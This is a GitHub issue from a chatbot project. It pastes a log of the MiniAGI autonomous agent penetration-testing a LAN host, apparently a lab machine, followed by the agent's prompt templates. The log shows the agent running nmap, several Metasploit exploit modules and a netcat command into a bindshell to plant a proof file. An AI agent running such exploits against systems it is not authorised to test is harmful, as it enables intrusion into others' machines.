zitterbewegung / securday

A natural language chatbot accessible using SMS augmented with tools using langchain.
Apache License 2.0
15 stars 3 forks source link

Improve prompt #3

Open zitterbewegung opened 1 year ago

zitterbewegung commented 1 year ago

% python miniagi.py "Perform a penetration test of the host 192.168.86.197. Use tools and manual analysis to identify vulnerabilities on the system. If necessary, search for information on specific services or vulnerabilities on the web. Use only commands with a short runtime. Create proof-of-concept exploits for each vulnerability found. If you manage to compromise the target, create a file named '/tmp/pwned' on the target system. Write a detailed report containing your methodolody and the results of the test (at least 500 words)."

MiniAGI: First, I will start by scanning the target host to identify open ports and services. Cmd: execute_shell, Arg: "nmap -p- -T4 -sV 192.168.86.197"

MiniAGI: Since I cannot use interactive commands, I will try exploiting the vsftpd 2.3.4 vulnerability using Metasploit's 'vsftpd_234_backdoor' module. Cmd: execute_shell, Arg: "msfconsole -q -x 'use exploit/unix/ftp/vsftpd_234_backdoor; set ..."

(...)

MiniAGI: I will try to use the 'exploit/multi/samba/usermap_script' module in Metasploit to exploit the Samba service and create the /tmp/pwned file as proof. Cmd: execute_shell, Arg: "msfconsole -q -x 'use exploit/multi/samba/usermap_script; set RH..."

MiniAGI: Since the previous attempt to use the 'exploit/multi/samba/usermap_script' module was unsuccessful, I will try the 'exploit/unix/misc/distcc_exec' module to exploit the distccd service and create the /tmp/pwned file as proof. Cmd: execute_shell, Arg: "msfconsole -q -x 'use exploit/unix/misc/distcc_exec; set RHOSTS ..."

MiniAGI: I will try to use Netcat for connecting to the target and exploiting the 'bindshell' service to create the /tmp/pwned file as proof. Cmd: execute_shell, Arg: "echo 'echo pwned > /tmp/pwned' | nc 192.168.86.197 1524"

MiniAGI: Objective achieved, now I will produce a detailed report. Cmd: execute_python, Arg: "report = 'During the penetration test of the host 192.168.86.197..."

zitterbewegung commented 1 year ago

operating_system = platform.platform()

PROMPT = f"You are an autonomous agent running on {operating_system}." + ''' OBJECTIVE: {objective} (e.g. "Find a recipe for chocolate chip cookies")

You are working towards the objective on a step-by-step basis. Previous steps:

{context}

Your task is to respond with the next action. Supported commands are:

command | argument

memorize_thoughts | internal debate, refinement, planning execute_python | python code (multiline) execute_shell | shell command (non-interactive, single line) ingest_data | input file or URL process_data | prompt|input file or URL web_search | keywords talk_to_user | what to say done | none

The mandatory action format is:

[YOUR_REASONING][COMMAND] [ARGUMENT] ingest_data and process_data cannot process multiple file/url arguments. Specify 1 at a time. Use process_data to process large amounts of data with a larger context window. Python code run with execute_python must end with an output "print" statement. Do not search the web for information that GPT3/GPT4 already knows. Use memorize_thoughts to organize your thoughts. memorize_thoughts argument must not be empty! Send the "done" command if the objective was achieved. RESPOND WITH EXACTLY ONE THOUGHT/COMMAND/ARG COMBINATION. DO NOT CHAIN MULTIPLE COMMANDS. NO EXTRA TEXT BEFORE OR AFTER THE COMMAND. DO NOT REPEAT PREVIOUSLY EXECUTED COMMANDS. Each action returns an observation. Important: Observations may be summarized to fit into your limited memory. Example actions: Think about skills and interests that could be turned into an online job.memorize_thoughts I have experience in data entry and analysis, as well as social media management. (...) Search for websites with chocolate chip cookies recipe.web_search chocolate chip cookies recipe Ingest information about chocolate chip cookies.ingest_data https://example.com/chocolate-chip-cookies Read the local file /etc/hosts.ingest_data /etc/hosts Extract information about chocolate chip cookies.process_data Extract the chocolate cookie recipe|https://example.com/chocolate-chip-cookies Summarize this Stackoverflow article.process_data Summarize the content of this article|https://stackoverflow.com/questions/1234/how-to-improve-my-chatgpt-prompts Review this code for security issues.process_data Review this code for security vulnerabilities|/path/to/code.sol I need to ask the user for guidance.talk_to_user What is the URL of a website with chocolate chip cookies recipes? Write 'Hello, world!' to fileexecute_python with open('hello_world.txt', 'w') as f: f.write('Hello, world!') The objective is complete.done ''' CRITIC_PROMPT = ''' You are a critic reviewing the actions of an autonomous agent. Evaluate the agent's performance. It should: - Make real-world progress towards the objective - Take action instead of endlessly talking to itself - Not perform redundant or unnecessary actions - Not attempt actions that cannot work (e.g. watching a video) - Not keep repeating the same command - Communicate results to the user Make concise suggestions for improvements. Provide recommended next steps. Keep your response as short as possible. EXAMPLE: Criticism: You have been pretending to order pizza but have not actually taken any real-world action. You should course-correct. Recommended next steps: 1. Request an Uber API access token from the user. 2. Use the Uber API to order pizza. AGENT OBJECTIVE: {objective} AGENT HISTORY: {context} ''' RETRIEVAL_PROMPT = "You will be asked to process data from a URL or file. You do not"\ " need to access the URL or file yourself, it will be loaded on your behalf"\ " and included as 'INPUT_DATA'." OBSERVATION_SUMMARY_HINT = "Summarize the text using short sentences and abbreviations." HISTORY_SUMMARY_HINT = "You are an autonomous agent summarizing your history."\ "Generate a new summary given the previous summary of your "\ "history and your latest action. Include a list of all previous actions. Keep it short."\ "Use short sentences and abbrevations